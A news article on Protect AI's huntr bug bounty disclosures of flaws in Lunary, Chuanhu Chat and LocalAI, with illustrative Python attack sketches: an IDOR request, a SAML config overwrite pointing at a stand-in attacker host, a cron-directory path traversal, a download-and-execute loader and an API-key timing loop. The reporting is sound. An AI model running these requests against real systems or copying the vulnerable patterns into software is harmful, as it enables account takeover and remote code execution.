
AI/ML, Vulnerability Management, Patch/Configuration Management


AI BUG BOUNTY PROGRAM YIELDS 34 FLAWS IN OPEN-SOURCE TOOLS

October 29, 2024

By Laura French

(Image credit: Adobe Stock)

Nearly three dozen flaws in open-source AI and machine learning (ML) tools were
disclosed Tuesday as part of Protect AI’s huntr bug bounty program.

The discoveries include three critical vulnerabilities: two in the Lunary AI
developer toolkit and one in a graphical user interface (GUI) for ChatGPT called
Chuanhu Chat. The October vulnerability report also includes 18 high-severity
flaws ranging from denial-of-service (DoS) to remote code execution (RCE).

“Through our own research and the huntr community, we’ve found the tools used in
the supply chain to build the machine learning models that power AI applications
to be vulnerable to unique security threats,” stated Protect AI Security
Researchers Dan McInerney and Marcello Salvati. “These tools are Open Source and
downloaded thousands of times a month to build enterprise AI Systems.”

Protect AI’s report also highlights vulnerabilities in LocalAI, a platform for
running AI models locally on consumer-grade hardware; LoLLMs, a web UI for
various AI systems; LangChain.js, a framework for developing language model
applications; and more.


LUNARY AI FLAWS RISK MANIPULATION OF AUTHENTICATION, EXTERNAL USERS

Two of the most severe vulnerabilities disclosed Tuesday through the huntr
program are flaws in the Lunary AI production toolkit for developers of large
language model (LLM) chatbots. The open-source toolkit is used by “2500+ AI
developers at top companies,” according to the Lunary AI website.

The flaws are tracked as CVE-2024-7474 and CVE-2024-7475, and both have a CVSS
score of 9.1.

CVE-2024-7474 is an insecure direct object reference (IDOR) flaw that could
allow an authenticated user to view or delete the user records of any other
external user due to lack of proper access control checks for requests to the
relevant API endpoints. If the attacker knows another user’s user ID, they can
replace their own user ID with the victim’s when calling these API endpoints,
which enables them to view and delete user records as though they were their
own.
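
As a rough illustration of the IDOR pattern described above, the request below
substitutes a victim's user ID into an otherwise ordinary authenticated call.
The host, endpoint path and header handling are assumptions made for this
sketch, not Lunary's actual API.

import requests

# Hypothetical IDOR sketch: the attacker authenticates as themselves but
# substitutes a victim's user ID in the request path. Without a server-side
# ownership check, another user's record can be viewed or deleted.
BASE_URL = "https://lunary.example.com/api"   # placeholder host
ATTACKER_TOKEN = "attacker-session-token"     # attacker's own valid session
VICTIM_USER_ID = "1234"                       # known or guessed victim ID

headers = {"Authorization": f"Bearer {ATTACKER_TOKEN}"}

view = requests.get(f"{BASE_URL}/users/{VICTIM_USER_ID}", headers=headers)
print(view.status_code)

delete = requests.delete(f"{BASE_URL}/users/{VICTIM_USER_ID}", headers=headers)
print(delete.status_code)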

CVE-2024-7475 is also due to improper access control, this time with regard to
requests to the Security Assertion Markup Language (SAML) configuration
endpoint. This flaw enables attackers to use crafted POST requests to this
endpoint to maliciously update the SAML configuration, which can lead to
manipulation of authentication processes and potentially fraudulent logins.
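
The unauthorized update described here follows a simple pattern; the sketch
below illustrates it under the assumption of a hypothetical endpoint path and
payload fields, which are not Lunary's real schema.

import requests

# Hypothetical sketch: a crafted POST that overwrites SAML identity-provider
# settings because the endpoint does not check the caller's privileges.
SAML_ENDPOINT = "https://lunary.example.com/api/saml/config"  # placeholder

malicious_config = {
    # Pointing IdP metadata at an attacker-controlled server would let the
    # attacker mint assertions that the application then trusts.
    "idp_metadata_url": "https://attacker.example.net/idp/metadata.xml",
    "sso_enabled": True,
}

resp = requests.post(SAML_ENDPOINT, json=malicious_config, timeout=10)
print(resp.status_code)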

Both flaws were addressed by Lunary and can be fixed by upgrading to Lunary
version 1.3.4.


CHUANHU CHAT, LOCALAI FLAWS COULD LEAD TO RCE, DATA LEAKAGE

An additional critical flaw disclosed in Protect AI’s report Tuesday is a path
traversal vulnerability in the user upload feature of Chuanhu Chat, which could
enable RCE, arbitrary directory creation and leakage of information from CSV
files due to improper sanitization of certain inputs. The flaw is tracked as
CVE-2024-5982 and has a CVSS score of 9.1.

CVE-2024-5982 can be exploited to achieve RCE by creating a user with a name
that includes an absolute path and then uploading a file with a cron job
configuration through the Chuanhu Chat interface. Additional modified user
requests can also be used to create arbitrary directories through the
“get_history_names” function and leak the first columns of CSV files through the
“load_template” function, Protect AI reports.
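
The root cause is a familiar path traversal pattern. The sketch below is a
simplified illustration, not Chuanhu Chat's actual code: joining an
attacker-supplied username into a filesystem path without sanitization lets an
absolute path escape the upload directory entirely.

import os

UPLOAD_ROOT = "/srv/app/uploads"  # assumed upload directory for illustration

def save_upload(username: str, filename: str, data: bytes) -> str:
    # Vulnerable pattern: os.path.join discards UPLOAD_ROOT when the
    # attacker-controlled username is an absolute path.
    target_dir = os.path.join(UPLOAD_ROOT, username)
    os.makedirs(target_dir, exist_ok=True)
    path = os.path.join(target_dir, filename)
    with open(path, "wb") as f:
        f.write(data)
    return path

# A username of "/etc/cron.d" would drop the uploaded file into the system
# cron directory instead of the upload root, turning a file upload into code
# execution once cron runs the job.
print(os.path.join(UPLOAD_ROOT, "/etc/cron.d", "job"))  # -> /etc/cron.d/job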

The Chuanhu Chat project has more than 15,200 stars and 2,300 forks on GitHub.
CVE-2024-5982 was fixed in Chuanhu Chat version 20240918.

LocalAI is another popular open-source AI project on GitHub with more than
24,000 stars and 1,900 forks. The huntr community discovered multiple
vulnerabilities in the platform, including an RCE flaw tracked as CVE-2024-6983
and a timing attack vulnerability tracked as CVE-2024-7010.

CVE-2024-6983, which has a CVSS score of 8.8, enables an attacker to upload a
malicious configuration file with a uniform resource identifier (URI) that
points to a malicious binary hosted on an attacker-controlled server. The binary
is then executed when the configuration file is processed on the target system.
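
The dangerous pattern behind this class of flaw is a loader that fetches and
runs whatever a configuration file points to. The sketch below is purely
illustrative; the field name and download-and-execute logic are assumptions,
not LocalAI's implementation.

import os
import stat
import subprocess
import tempfile
import urllib.request

def process_config(config: dict) -> None:
    # Illustrative sketch: trust a URI found in an uploaded configuration file
    # and execute whatever it downloads ("backend_uri" is a made-up field name).
    uri = config["backend_uri"]  # attacker-controlled if the config is untrusted
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "wb") as out, urllib.request.urlopen(uri) as resp:
        out.write(resp.read())
    os.chmod(path, os.stat(path).st_mode | stat.S_IEXEC)
    subprocess.run([path])  # RCE if the URI serves a malicious binary

# process_config({"backend_uri": "https://attacker.example.net/payload"})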

CVE-2024-7010, CVSS score 7.5, can enable a timing attack, which is a type of
side-channel attack that measures the response time of a server when processing
an API key. If an attacker were to set up a script that sends multiple API key
guesses to the server and records the response times for each key, they could
eventually predict the correct key to gain unauthorized access.
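
A timing attack of this kind boils down to measuring how long the server takes
to reject each guess. The script below is a simplified, hypothetical sketch of
that measurement loop; the endpoint and candidate keys are placeholders, not
LocalAI's actual API.

import time
import requests

# Hypothetical timing measurement loop: send candidate API keys and record how
# long the server takes to reject each one. A non-constant-time comparison
# leaks how many leading characters of a guess were correct.
TARGET = "https://localai.example.com/v1/models"  # placeholder endpoint
CANDIDATES = ["sk-aaaa", "sk-abaa", "sk-abca"]    # example guesses

timings = {}
for key in CANDIDATES:
    start = time.perf_counter()
    requests.get(TARGET, headers={"Authorization": f"Bearer {key}"}, timeout=10)
    timings[key] = time.perf_counter() - start

# Slower rejections suggest more characters matched before the comparison
# failed; repeating the loop and averaging reduces network noise.
for key, elapsed in sorted(timings.items(), key=lambda kv: -kv[1]):
    print(f"{key}: {elapsed:.4f}s")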

CVE-2024-6983 can be patched by upgrading to LocalAI version 2.19.4, while
fixing CVE-2024-7010 requires an upgrade to version 2.21.





